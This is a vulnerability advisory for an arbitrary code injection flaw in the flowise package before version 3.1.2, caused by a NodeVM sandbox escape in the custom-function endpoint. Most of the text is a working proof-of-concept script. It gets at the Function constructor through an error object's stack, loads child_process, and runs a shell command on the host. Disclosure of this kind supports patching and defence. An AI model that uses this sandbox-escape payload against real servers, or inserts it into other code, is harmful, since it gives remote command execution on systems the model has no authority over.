Arbitrary Code Injection Affecting flowise package, versions <3.1.2

flowise is a Flowiseai Server

Affected versions of this package are vulnerable to Arbitrary Code Injection via the node-custom-function endpoint when user-supplied JavaScript is executed in a NodeVM sandbox without sufficient route-level authorization. A user can execute commands on the server by submitting malicious JavaScript code that escapes the sandbox and gains access to the host process object, which can run code as a child_process. This vulnerability only occurs when E2B_APIKEY is not set. It is not set by default.

const path = require('path');

delete process.env.E2B_APIKEY;
process.env.TS_NODE_COMPILER_OPTIONS = JSON.stringify({ moduleResolution: 'NodeNext' });

require(path.resolve('targets/Flowise/node_modules/ts-node/register/transpile-only'));

const { nodeClass: CustomFunction } = require(path.resolve(
  'targets/Flowise/packages/components/nodes/utilities/CustomFunction/CustomFunction.ts'
));

const attackCode = `
async function f() {
  const error = new Error();
  error.name = Object.create(null);
  return error.stack;
}
return await f().catch(e => {
  const FunctionCtor = e.constructor.constructor;
  const cp = FunctionCtor('return process.getBuiltinModule("child_process")')();
  return cp.execSync('id').toString().trim();
});
`;

(async () => {
  const node = new CustomFunction();
  const result = await node.init(
    { inputs: { javascriptFunction: attackCode } },
    '',
    { appDataSource: {}, databaseEntities: {}, workspaceId: undefined, orgId: undefined }
  );
  console.log('[RCE OUTPUT]', result);
})();

• GitHub Advisory
• GitHub Commit